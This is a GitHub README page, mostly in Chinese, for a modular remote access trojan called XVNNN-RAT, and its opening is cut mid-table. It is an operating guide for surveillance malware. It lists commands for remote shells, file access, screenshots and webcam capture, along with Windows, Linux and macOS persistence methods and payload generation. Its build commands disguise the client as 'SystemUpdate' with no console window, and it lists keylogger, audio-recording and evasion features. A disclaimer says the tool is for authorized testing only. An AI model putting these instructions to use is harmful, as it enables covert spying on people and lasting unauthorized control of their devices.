AliZafar780/xvn-rat
GitHub: AliZafar780/xvn-rat
一款跨平台的模块化远程访问工具,专为授权安全研究与渗透测试设计,支持多系统远程控制和持久化机制研究。
Stars: 0 | Forks: 0
# XVNNN-RAT - Remote Access Tool
` | 打开交互式 shell | `xvn> shell 1` |
| `files ` | 浏览文件 | `xvn> files 1` |
| `screen ` | 截图 | `xvn> screen 1` |
| `webcam ` | 捕获摄像头 | `xvn> webcam 1` |
| `info ` | 系统信息 | `xvn> info 1` |
| `persist ` | 添加持久化 | `xvn> persist 1 registry` |
| `stop` | 停止服务端 | `xvn> stop` |
| `exit` | 退出服务端 | `xvn> exit` |
### 持久化方法
**Windows:**
- `registry` - 添加到注册表运行键
- `scheduled_task` - 创建计划任务
- `service` - 创建 Windows 服务
- `startup` - 添加到启动文件夹
- `wmi` - WMI 事件订阅
- `all` - 尝试所有方法
**Linux:**
- `cron` - 添加到 crontab
- `systemd` - 创建 systemd 服务
- `shell_profile` - 添加到 .bashrc/.zshrc
- `ld_preload` - 添加到 LD_PRELOAD
- `all` - 尝试所有方法
**macOS:**
- `login_item` - 添加到登录项
## 🔧 Payload 生成
### 生成 Payload
```
python3 generate.py
```
**可用选项:**
1. Windows Python Payload
2. Linux Python Payload
3. Shell Script Payload
4. 生成所有 Payload
5. Android APK 项目
6. 退出
### 构建可执行文件
**Windows:**
```
# 使用 PyInstaller 构建
pyinstaller --onefile --noconsole --name "SystemUpdate" src/client/main.py
```
**Linux:**
```
pyinstaller --onefile --name "system-update" src/client/main.py
```
**Android APK:**
```
# 生成 APK 项目
python3 generate.py
# 选择选项 5 (Android APK)
# 使用 Buildozer 构建
cd apk_builds/SystemUpdate
buildozer android debug
```
## 📁 项目结构
```
xvn-rat/
├── src/
│ ├── client/ # Client application
│ │ └── main.py # Main client
│ ├── server/ # Server applications
│ │ ├── main.py # GUI server
│ │ └── headless.py # CLI server
│ ├── modules/ # Feature modules
│ │ ├── shell.py # Remote shell
│ │ ├── filemanager.py # File operations
│ │ ├── screen.py # Screenshot
│ │ ├── webcam.py # Webcam capture
│ │ ├── audio.py # Audio recording
│ │ ├── systeminfo.py # System info
│ │ ├── keylogger.py # Keylogger
│ │ ├── process.py # Process management
│ │ ├── network.py # Network tools
│ │ └── persistence.py # Persistence
│ ├── utils/ # Utility functions
│ │ ├── network.py # Network utilities
│ │ ├── system.py # System utilities
│ │ └── security.py # Security utilities
│ └── generator/ # Payload generators
│ ├── apk_generator.py
│ └── payload_generator.py
├── docs/ # Documentation
├── generate.py # Payload generation tool
├── setup.sh # Setup script
├── test_advanced.py # Test suite
└── README.md # This file
```
## 🧪 测试
### 运行测试套件
```
python3 test_advanced.py
```
### 手动测试
1. 在一个终端中启动服务端
2. 在另一个终端中启动客户端
3. 测试命令:
- `list` - 验证客户端是否出现
- `shell 1` - 测试远程命令执行
- `files 1` - 测试文件浏览
- `info 1` - 测试系统信息收集
## 🔒 安全注意事项
### 授权测试的最佳实践
1. **获取许可:** 始终获得书面授权
2. **使用隔离环境:** 在受控的实验室环境中测试
3. **记录活动:** 保留详细的测试活动日志
4. **安全通信:** 在真实测试中使用加密通道
5. **清理现场:** 测试后删除所有已安装的组件
### 网络安全
- 默认端口:4444(生产环境请更改)
- 默认无加密(教育用途)
- 真实部署请考虑 TLS/SSL
### 认证
- 默认配置无认证
- 生产使用前请添加认证
- 考虑基于证书的认证
## 📚 文档
- **README.md** - 本文件(安装与快速入门)
- **docs/INSTALLATION.md** - 详细安装指南
## 🛠️ 故障排除
### 常见问题
**问题:“Module not found”错误**
```
# 安装缺失的依赖
pip3 install pynput mss Pillow psutil --break-system-packages
```
**问题:网络摄像头不工作**
```
# 安装 OpenCV
pip3 install opencv-python --break-system-packages
```
**问题:音频不工作**
```
# 安装 PyAudio
pip3 install pyaudio --break-system-packages
```
**问题:连接被拒绝**
- 检查服务端是否正在运行
- 验证防火墙是否允许端口 4444
- 如有需要,尝试其他端口
**问题:Linux 上权限被拒绝**
- 某些功能可能需要 sudo
- 尝试以提升的权限运行以进行测试
## 📊 性能
### 系统要求
- **最低:** Python 3.7+, 2GB RAM
- **推荐:** Python 3.9+, 4GB RAM
- **最佳:** Python 3.11+, 8GB RAM
### 资源使用
- **CPU:** 空闲时低,文件操作期间中等
- **内存:** 客户端约 50MB,服务端约 100MB
- **网络:** 带宽占用极小
## 📝 许可证
MIT License
Copyright (c) 2024 Ali Zafar (alizafarbati@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
## 📞 支持与联系
如有问题或疑问:
- **作者:** Ali Zafar
- **邮箱:** alizafarbati@gmail.com
- **仓库:** https://github.com/AliZafar780/xvn-rat
## 🎯 免责声明
**XVNNN-RAT 仅用于教育和授权安全研究目的。**
作者不对滥用此工具的行为承担责任。用户有责任遵守所有适用的法律法规。
**使用此工具即表示您同意:**
1. 仅在您拥有或获得明确测试许可的系统上使用
2. 对您的行为承担全部责任
3. 遵守所有适用的法律
**祝您黑客愉快! 🎉**
*记住:在进行安全测试之前,请务必获得适当的授权。*
标签:Android, DSL, Payload生成, PE 加载器, Python, RAT, 云存储安全, 代码混淆, 免杀技术, 反弹Shell, 反虚拟机, 命令与控制, 嗅探欺骗, 安全教育, 安全测试, 屏幕监控, 摄像头访问, 攻击性安全, 文件管理, 无后门, 暴力破解检测, 权限维持, 漏洞挖掘, 网络安全, 网络扫描, 远程控制, 远程访问工具, 逆向工具, 隐私保护, 麦克风录音